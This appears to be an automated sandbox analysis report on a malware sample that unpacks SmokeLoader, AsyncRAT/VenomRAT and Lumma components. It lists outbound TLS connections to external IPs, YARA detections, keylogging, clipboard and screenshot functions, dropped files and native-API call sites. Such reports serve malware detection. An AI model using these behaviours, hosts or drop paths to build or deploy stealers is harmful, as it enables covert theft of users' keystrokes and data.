Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62393 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62394 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62395 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62396 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62398 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:62399 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:62400 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:62401 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected AsyncRAT
Source: Yara match File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected VenomRAT
Source: Yara match File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR
Contains functionality to log keystrokes (.Net Source)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs .Net Code: KeyboardLayout
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Keylogger.cs .Net Code: KeyboardLayout
Contains functionality for read data from the clipboard
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0307ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_0307ED00
Contains functionality to read the clipboard data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0307ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_0307ED00
Contains functionality to record screenshots
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0307FB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 16_2_0307FB2F

Spam, unwanted Advertisements and Ransom Demands
barindex
Reads the Security eventlog
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Reads the System eventlog
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Found suspicious ZIP file
Source: venom.zip.14.dr Zip Entry: runvm.bat
Source: lumma.zip.14.dr Zip Entry: run.bat
PE file has a writeable .text section
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: adjijwj.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Memory allocated: 75D90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Memory allocated: 75D90000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401513
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess, 0_2_00402FD3
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_0040267C NtEnumerateKey, 0_2_0040267C
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation, 0_2_004020C4
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004026DC NtClose, 0_2_004026DC
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation, 0_2_004020E3
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation, 0_2_004020E7
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation, 0_2_004020FC
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00402285 NtQuerySystemInformation, 0_2_00402285
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation, 0_2_004020B6
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation, 0_2_004020B8
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess, 0_2_00403149
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401553
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,towlower, 0_2_00403303
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040151E
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Code function: 0_2_004025DD NtOpenKey, 0_2_004025DD
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641636900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation, 7_2_00007FF641636900
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641655260 NtAllocateVirtualMemory, 7_2_00007FF641655260
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641653F30 NtQueryInformationProcess, 7_2_00007FF641653F30
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641655100 NtWriteVirtualMemory, 7_2_00007FF641655100
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416559D0 NtProtectVirtualMemory, 7_2_00007FF6416559D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641654FC0 NtReadVirtualMemory, 7_2_00007FF641654FC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D7370 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 19_2_6C8D7370
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_6C8D7490 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 19_2_6C8D7490
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E2A98 NtProtectVirtualMemory, 19_2_028E2A98
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Code function: 19_2_028E2640 NtProtectVirtualMemory, 19_2_028E2640
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C867490 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError, 20_2_6C867490
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_6C867370 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 20_2_6C867370
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Code function: 20_2_0251167A NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect, 20_2_0251167A
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160E810 7_2_00007FF64160E810
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415F64A0 7_2_00007FF6415F64A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64163B6B0 7_2_00007FF64163B6B0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160BAB0 7_2_00007FF64160BAB0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641678AB0 7_2_00007FF641678AB0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161B6A0 7_2_00007FF64161B6A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641643E80 7_2_00007FF641643E80
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641642080 7_2_00007FF641642080
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641621880 7_2_00007FF641621880
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641645860 7_2_00007FF641645860
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415F1450 7_2_00007FF6415F1450
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641600050 7_2_00007FF641600050
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164CC40 7_2_00007FF64164CC40
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641601920 7_2_00007FF641601920
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641673F20 7_2_00007FF641673F20
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641631510 7_2_00007FF641631510
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641605910 7_2_00007FF641605910
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641651700 7_2_00007FF641651700
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FA0F0 7_2_00007FF6415FA0F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416304D0 7_2_00007FF6416304D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641613AD0 7_2_00007FF641613AD0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415F5AD4 7_2_00007FF6415F5AD4
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641605ED0 7_2_00007FF641605ED0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416716C0 7_2_00007FF6416716C0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416343B0 7_2_00007FF6416343B0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160D7A0 7_2_00007FF64160D7A0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64165898B 7_2_00007FF64165898B
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161D390 7_2_00007FF64161D390
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641655B80 7_2_00007FF641655B80
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641676B70 7_2_00007FF641676B70
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641654370 7_2_00007FF641654370
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164F370 7_2_00007FF64164F370
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FFB70 7_2_00007FF6415FFB70
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641647D60 7_2_00007FF641647D60
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641633150 7_2_00007FF641633150
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641639550 7_2_00007FF641639550
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641620740 7_2_00007FF641620740
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641665D40 7_2_00007FF641665D40
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641629830 7_2_00007FF641629830
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166C230 7_2_00007FF64166C230
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164E430 7_2_00007FF64164E430
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641603E30 7_2_00007FF641603E30
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64164B020 7_2_00007FF64164B020
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FC400 7_2_00007FF6415FC400
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641607000 7_2_00007FF641607000
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6415FBC00 7_2_00007FF6415FBC00
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161FC10 7_2_00007FF64161FC10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641648C10 7_2_00007FF641648C10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641652010 7_2_00007FF641652010
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641664E10 7_2_00007FF641664E10
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641614E00 7_2_00007FF641614E00
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641646DF0 7_2_00007FF641646DF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416411F0 7_2_00007FF6416411F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64160CFF0 7_2_00007FF64160CFF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416749F0 7_2_00007FF6416749F0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641604BF0 7_2_00007FF641604BF0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF641636DE0 7_2_00007FF641636DE0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416229E0 7_2_00007FF6416229E0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64161A9D0 7_2_00007FF64161A9D0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166DFD0 7_2_00007FF64166DFD0
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF6416357C0 7_2_00007FF6416357C0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC3430 10_2_00007FFD9BAC3430
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC4196 10_2_00007FFD9BAC4196
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC51C8 10_2_00007FFD9BAC51C8
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC970C 10_2_00007FFD9BAC970C
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAC4752 10_2_00007FFD9BAC4752
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAD14D0 10_2_00007FFD9BAD14D0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAD0928 10_2_00007FFD9BAD0928
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 10_2_00007FFD9BAD0F0D 10_2_00007FFD9BAD0F0D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB4182 12_2_00007FFD9BAB4182
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB3BC6 12_2_00007FFD9BAB3BC6
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB51C0 12_2_00007FFD9BAB51C0
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB2EDF 12_2_00007FFD9BAB2EDF
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Code function: 12_2_00007FFD9BAB36CC 12_2_00007FFD9BAB36CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB63FB 14_2_00007FFD9BAB63FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB3AFB 14_2_00007FFD9BAB3AFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAC10FA 14_2_00007FFD9BAC10FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB6040 14_2_00007FFD9BAB6040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFD9BAB0E35 14_2_00007FFD9BAB0E35
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03061B25 16_2_03061B25
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03071B52 16_2_03071B52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03072290 16_2_03072290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030672DD 16_2_030672DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030552E0 16_2_030552E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03067189 16_2_03067189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03076F80 16_2_03076F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308CD40 16_2_0308CD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0306EC40 16_2_0306EC40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03083CD0 16_2_03083CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0305FB10 16_2_0305FB10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308D340 16_2_0308D340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B350 16_2_0308B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03056B70 16_2_03056B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030733B6 16_2_030733B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03074BF0 16_2_03074BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03076210 16_2_03076210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03057270 16_2_03057270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0305C270 16_2_0305C270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030682CB 16_2_030682CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03054900 16_2_03054900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03058960 16_2_03058960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B160 16_2_0308B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030741A0 16_2_030741A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_030729C9 16_2_030729C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308A9E4 16_2_0308A9E4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308D010 16_2_0308D010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B840 16_2_0308B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0306E086 16_2_0306E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03088880 16_2_03088880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03076890 16_2_03076890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_0308B700 16_2_0308B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03051F10 16_2_03051F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03073F97 16_2_03073F97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03064E68 16_2_03064E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03063678 16_2_03063678
